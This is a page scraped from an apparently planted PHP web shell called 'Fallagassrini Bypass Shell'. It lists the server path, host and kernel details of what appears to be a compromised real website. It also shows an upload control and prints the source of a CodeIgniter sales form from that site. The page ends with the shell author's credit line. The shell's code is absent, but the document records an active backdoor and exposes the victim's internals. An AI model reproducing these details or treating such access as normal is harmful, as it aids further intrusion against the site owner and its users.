? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/sgms/application/views/Sales/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/sgms/application/views/Sales/edit_employeecustomer.php

<?php  
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>

<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('sales','viewinsalessearch','search_employeecustomer','view_employeecustomer','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  />
    </label>
    <span class="heading">Allocate customer to employee</span>
</div>

<fieldset>
    <?php
        $attributes=array('id'=>'validateform','class'=>'customForm');
        echo form_open('sales/addinsales/update_employeecustomer/view_employeecustomer/1',$attributes);
    ?>
    <ul>
        <li>
            <label for="data">Customer Name</label>
            <div class="record_entry"><?=$this->mastermodel->getSingleFieldValue('customer','customer_name','customer_id',$viewinfo->customer_id);?></div>
            <input type="hidden" name="employeecustomer_id" value="<?=$viewinfo->employeecustomer_id;?>"/>
        </li>
        <li>
            <label for="data">Employee Name</label>
            <div class="record_entry"><?=$this->mastermodel->getSingleFieldValue('employee','employee_name','employee_id',$viewinfo->employee_id);?></div>
        </li>
        <li>
            <label for="data">Alloted Date</label>
                 <?php
                      $data = array(
                      'name'        => 'customer_allocation_date',
                      'id'          => 'customer_allocation_date',
                      'class'       => 'required calfocus',
                      'value'       => $this->mastermodel->convertdatenormalformat($viewinfo->customer_allocation_date)
                      );
                      echo form_input($data).form_error($data);
                 ?>
        </li>
        <li>
           <label for="data">Description</label>
             <?php
                  $data = array(
                  'name'        => 'description',
                  'id'          => 'description',
                  'value'       =>  $viewinfo->description
                  );
                  echo form_textarea($data).form_error($data);
             ?>
            <input type="hidden" name="tab_name" value="employeecustomer"/>
            <input type="hidden" name="resfunction" value="search_employeecustomer"/>
        </li>
        
        <li>
            <label for="submit">&nbsp;</label>
            <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Save</button>
        </li>
    </ul>
<?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net